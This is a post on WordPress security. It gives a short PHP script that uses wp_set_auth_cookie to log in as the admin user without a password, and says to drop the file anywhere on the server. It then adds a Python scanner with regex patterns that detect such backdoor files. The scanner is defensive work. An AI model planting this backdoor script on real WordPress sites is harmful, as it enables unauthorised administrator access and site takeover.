WordPress Hacking
This may be a bit of an old trick; however, since it is alive and well and working in WordPress 3.5.2 (the current version when this was first posted; the actual current version for this repost is 4.8.2, and it still works), it is being addressed again (for the first time on this site).
As you may know, if you have access to the database for a WordPress site, you can easily change the admin password. However, the clever little trick below allows the user (attacker?) to log in to your system as admin (or as any other user if they know the user ID, which is exposed through posts, blog articles, etc. on most websites running WordPress).
    include('wp-config.php');

    $user_id = 1; // Default admin user id. (usually the first user entered into the database)
    $remember = 1; // Remember Session (14 days approx)
    $secure = 0; // Use SSL

    // Force authorization as the above user without password
    wp_set_auth_cookie( $user_id, $remember, $secure );

    header('location: ./wp-admin/');
All you need to do is create a file in the WordPress root and paste the above code. If you do not have access to the root directory of WordPress, that is okay; you just create the file anywhere and update the code to point to where 'wp-config.php' is located relative to the new file.
The scary part is that a potential attacker could trample all over your WordPress installation if granted enough access to upload a script like the above, and it doesn't matter where the upload happens.
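Seen from the defender's side, a script like the one above leaves a recognizable trace on disk: a standalone PHP file that includes a WordPress bootstrap file and then calls wp_set_auth_cookie. The Python scanner below is an added example, not code from the original post; its function names, the extra uploads-directory check, and the sample files are assumptions made for illustration. Matches are candidates for review, since a legitimate plugin can match the same pattern.

```python
import os
import re

# include/require of a WordPress bootstrap file, at any relative depth.
BOOTSTRAP = re.compile(
    r"\b(?:include|require)(?:_once)?\b[^;]*?\bwp-(?:config|load|blog-header)\.php",
    re.IGNORECASE | re.DOTALL)
# The call that issues a logged-in cookie without any password check.
AUTH_COOKIE = re.compile(r"\bwp_set_auth_cookie\s*\(", re.IGNORECASE)
PHP_EXT = (".php", ".phtml", ".php5", ".phar")

def inspect_source(src, rel_path):
    """Return the reasons a PHP file deserves review (empty list if none)."""
    reasons = []
    if BOOTSTRAP.search(src) and AUTH_COOKIE.search(src):
        reasons.append("bootstraps WordPress and calls wp_set_auth_cookie")
    if "/uploads/" in "/" + rel_path:
        reasons.append("PHP file inside an uploads directory")
    return reasons

def scan_tree(root):
    """Walk root and return {relative_path: reasons} for flagged PHP files."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXT):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "r", encoding="utf-8", errors="replace") as fh:
                reasons = inspect_source(fh.read(), rel)
            if reasons:
                findings[rel] = reasons
    return findings

def build_sample_tree(root):
    """Write constructed sample files (not taken from any real site)."""
    samples = {
        "wp-content/uploads/2017/10/x.php":
            "<?php include('../../../../wp-config.php');\nwp_set_auth_cookie( 1, 1, 0 );",
        "wp-content/plugins/sso/login.php":
            "<?php function sso_done($id) { wp_set_auth_cookie($id); }",
        "tools/dbcheck.php": "<?php require_once 'wp-config.php'; echo DB_NAME;",
    }
    for rel, body in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
```

Calling scan_tree on the WordPress root (or the whole web root, since the file can sit anywhere) returns a dictionary of flagged paths and the reasons for each.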